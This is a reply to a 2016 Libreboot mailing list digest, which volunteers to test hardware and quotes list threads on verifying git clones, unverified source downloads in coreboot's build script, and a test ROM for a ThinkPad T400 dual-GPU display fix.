I have a t500. I'm willing to test. On Aug 22, 2016 12:00 PM, <[email protected]> wrote:
> Send Libreboot mailing list submissions to > [email protected] > > To subscribe or unsubscribe via the World Wide Web, visit > https://lists.gnu.org/mailman/listinfo/libreboot > or, via email, send a message with subject or body 'help' to > [email protected] > > You can reach the person managing the list at > [email protected] > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of Libreboot digest..." > > > Today's Topics: > > 1. Re: Git clone authentication (koanhead) > 2. tester needed for t400 (Arthur Heymans) > 3. Re: Git clone authentication (Duncan Guthrie) > 4. Re: GNU Libreboot, version 20160818 released (Robert Alessi) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sun, 21 Aug 2016 16:53:04 -0700 > From: koanhead <[email protected]> > To: [email protected] > Subject: Re: [Libreboot] Git clone authentication > Message-ID: <[email protected]> > Content-Type: text/plain; charset=utf-8 > > On 08/20/2016 02:11 AM, Leah Rowe wrote: > > Hi, > > > > Op 20/08/16 om 01:41 schreef koanhead: > ... > > > >> Other than that, if you clone the repository in a manner vulnerable > >> to MITM, you should still be able to verify its checksum against > >> the one that's published. As far as I can tell from perusing > >> http://git.savannah.gnu.org/cgit/libreboot.git/, there's no global > >> sum published for the whole tree. This might not matter, since > >> after all we're using git, which uses hashes to identify the > >> objects it tracks. The cgit link above shows some of these hashes. > >> I'm not sure just now how exactly to convince git to emit enough of > >> the correct information that you can compare the results with those > >> shown on the savannah site, so I'm going to send this off as-is and > >> look into it; if I figure it out I'll post in reply to this. > >> Hopefully someone else out there already knows how to do this > >> thing? > > > > > > sha1 was broken afaik, I don't remember the link but I was reading > > about it. Whether it's practical in practise to mitm accesses to the > > git repository I don't know. > > As to whether that's practical, I don't know either, but Leah is > definitely right about sha1 having been 'broken' in the sense that it's > possible to generate sha1 hash collisions in somewhat reasonable time. > > According to > https://en.wikipedia.org/wiki/SHA-1#Cryptanalysis_and_validation it was > do-able but very expensive in 2005; I expect it's a lot cheaper now. > > I had thought that it might be practical to verify the path from the > root of the git tree to the HEAD of whichever branch you're pulling by > validating each hash in order; but that's only a linear increase in > complexity (unless you have lots of branches having lots of branches) so > it doesn't seem like it would be worthwhile to try. If anyone still > wants to try it they can grep the list of commits from `git log`. > > Fortunately it doesn't matter, because https! > > > > > > ------------------------------ > > Message: 2 > Date: Mon, 22 Aug 2016 02:04:06 +0200 > From: Arthur Heymans <[email protected]> > To: libreboot <[email protected]> > Subject: [Libreboot] tester needed for t400 > Message-ID: <[email protected]> > Content-Type: text/plain; charset="us-ascii" > > Hi > > Currently libreboot reverses a patch in coreboot that is supposed to > handle lenovo systems with 2 gpu's attached. This revert had to be done > because > this hybrid lenovo gpu driver does not work on t400 and results in the > display not working in either grub or linux. > > A proper fix is needed and I think to know how but I don't have a t400 > to test. So it would be nice if someone could test a rom for me on his/her > t400 with dual > graphics to confirm its working. > link to rom: > https://home.aheymans.xyz/shared/coreboot_t400.rom > > How to test: > 1) flash that rom > 2) boot into GNU/linux > 3) report if you have working display in GNU/linux > > notes: > - that its possible this patch does not work and then you won't have > a working display in linux so be prepared to either work blindly or use > ssh to reflash a working rom > - its unknown if you will have working grub on high res screens > > Technical details: the hybrid driver uses wrong gpio (gpio52 instead of > gpio22) on t400 to connect gpu's to the display. > > PATCH: > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: diff > Type: application/octet-stream > Size: 354 bytes > Desc: not available > URL: <http://lists.gnu.org/archive/html/libreboot/attachments/ > 20160822/644d538e/attachment.obj> > -------------- next part -------------- > > > > -- > Arthur Heymans > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: signature.asc > Type: application/pgp-signature > Size: 800 bytes > Desc: not available > URL: <http://lists.gnu.org/archive/html/libreboot/attachments/ > 20160822/644d538e/attachment.pgp> > > ------------------------------ > > Message: 3 > Date: Mon, 22 Aug 2016 01:15:56 +0100 > From: Duncan Guthrie <[email protected]> > To: [email protected] > Subject: Re: [Libreboot] Git clone authentication > Message-ID: <[email protected]> > Content-Type: text/plain; charset=UTF-8 > > I did some more investigation into these issues. > > More worrying is the build process of crossgcc. It downloads source > tarballs for its dependencies over regular http, and doesn't even verify > the checksums, let alone cryptographic signatures. I asked about this on > #coreboot IRC, and luckily, there is a patch on Coreboot's code review > website, and this will probably end up being put in upstream: > http://review.coreboot.org/#/c/15170/. This is, of course, incredibly bad > form, but it is good that Coreboot developers are willing to fix the > problem. > > With the cached packages being included in Libreboot source distribution, > can someone confirm to me whether these had signatures verified, or at > least checksums (manually, I presume)? Because otherwise, if some malicious > group wanted to target a whole group of users (read: juicy targets) with an > interest in preservation of privacy, one could target the Libreboot project > developers. I doubt it would be especially difficult. I really hope you > verified them... > > Either way, fixing the build process, obviously starting with applying the > patch to Coreboot is absolutely essential. I can't really believe nobody > here ever inquired into security of the buildgcc script. > > Thanks for all your responses, > D. > > On 22 August 2016 00:53:04 BST, koanhead <[email protected]> wrote: > >On 08/20/2016 02:11 AM, Leah Rowe wrote: > >> Hi, > >> > >> Op 20/08/16 om 01:41 schreef koanhead: > >... > >> > >>> Other than that, if you clone the repository in a manner vulnerable > >>> to MITM, you should still be able to verify its checksum against > >>> the one that's published. As far as I can tell from perusing > >>> http://git.savannah.gnu.org/cgit/libreboot.git/, there's no global > >>> sum published for the whole tree. This might not matter, since > >>> after all we're using git, which uses hashes to identify the > >>> objects it tracks. The cgit link above shows some of these hashes. > >>> I'm not sure just now how exactly to convince git to emit enough of > >>> the correct information that you can compare the results with those > >>> shown on the savannah site, so I'm going to send this off as-is and > >>> look into it; if I figure it out I'll post in reply to this. > >>> Hopefully someone else out there already knows how to do this > >>> thing? > >> > >> > >> sha1 was broken afaik, I don't remember the link but I was reading > >> about it. Whether it's practical in practise to mitm accesses to the > >> git repository I don't know. > > > >As to whether that's practical, I don't know either, but Leah is > >definitely right about sha1 having been 'broken' in the sense that it's > >possible to generate sha1 hash collisions in somewhat reasonable time. > > > >According to > >https://en.wikipedia.org/wiki/SHA-1#Cryptanalysis_and_validation it was > >do-able but very expensive in 2005; I expect it's a lot cheaper now. > > > >I had thought that it might be practical to verify the path from the > >root of the git tree to the HEAD of whichever branch you're pulling by > >validating each hash in order; but that's only a linear increase in > >complexity (unless you have lots of branches having lots of branches) > >so > >it doesn't seem like it would be worthwhile to try. If anyone still > >wants to try it they can grep the list of commits from `git log`. > > > >Fortunately it doesn't matter, because https! > > > ------------------------------ > > Message: 4 > Date: Mon, 22 Aug 2016 12:49:29 +0200 > From: Robert Alessi <[email protected]> > To: Leah Rowe <[email protected]> > Cc: [email protected] > Subject: Re: [Libreboot] GNU Libreboot, version 20160818 released > Message-ID: <[email protected]> > Content-Type: text/plain; charset="us-ascii" > > Good point. This way everyone may use it. > > On Sat, Aug 20, 2016 at 10:08:54AM +0100, The Gluglug wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > On the other hand, a statically compiled 32-bit binary should also > > work on 64-bit distros, so i coul ddo that. > > > -------------- next part -------------- > A non-text attachment was scrubbed... > Name: signature.asc > Type: application/pgp-signature > Size: 801 bytes > Desc: not available > URL: <http://lists.gnu.org/archive/html/libreboot/attachments/ > 20160822/5a1f6443/attachment.pgp> > > ------------------------------ > > Subject: Digest Footer > > _______________________________________________ > Libreboot mailing list > [email protected] > https://lists.gnu.org/mailman/listinfo/libreboot > > > ------------------------------ > > End of Libreboot Digest, Vol 23, Issue 23 > ***************************************** >
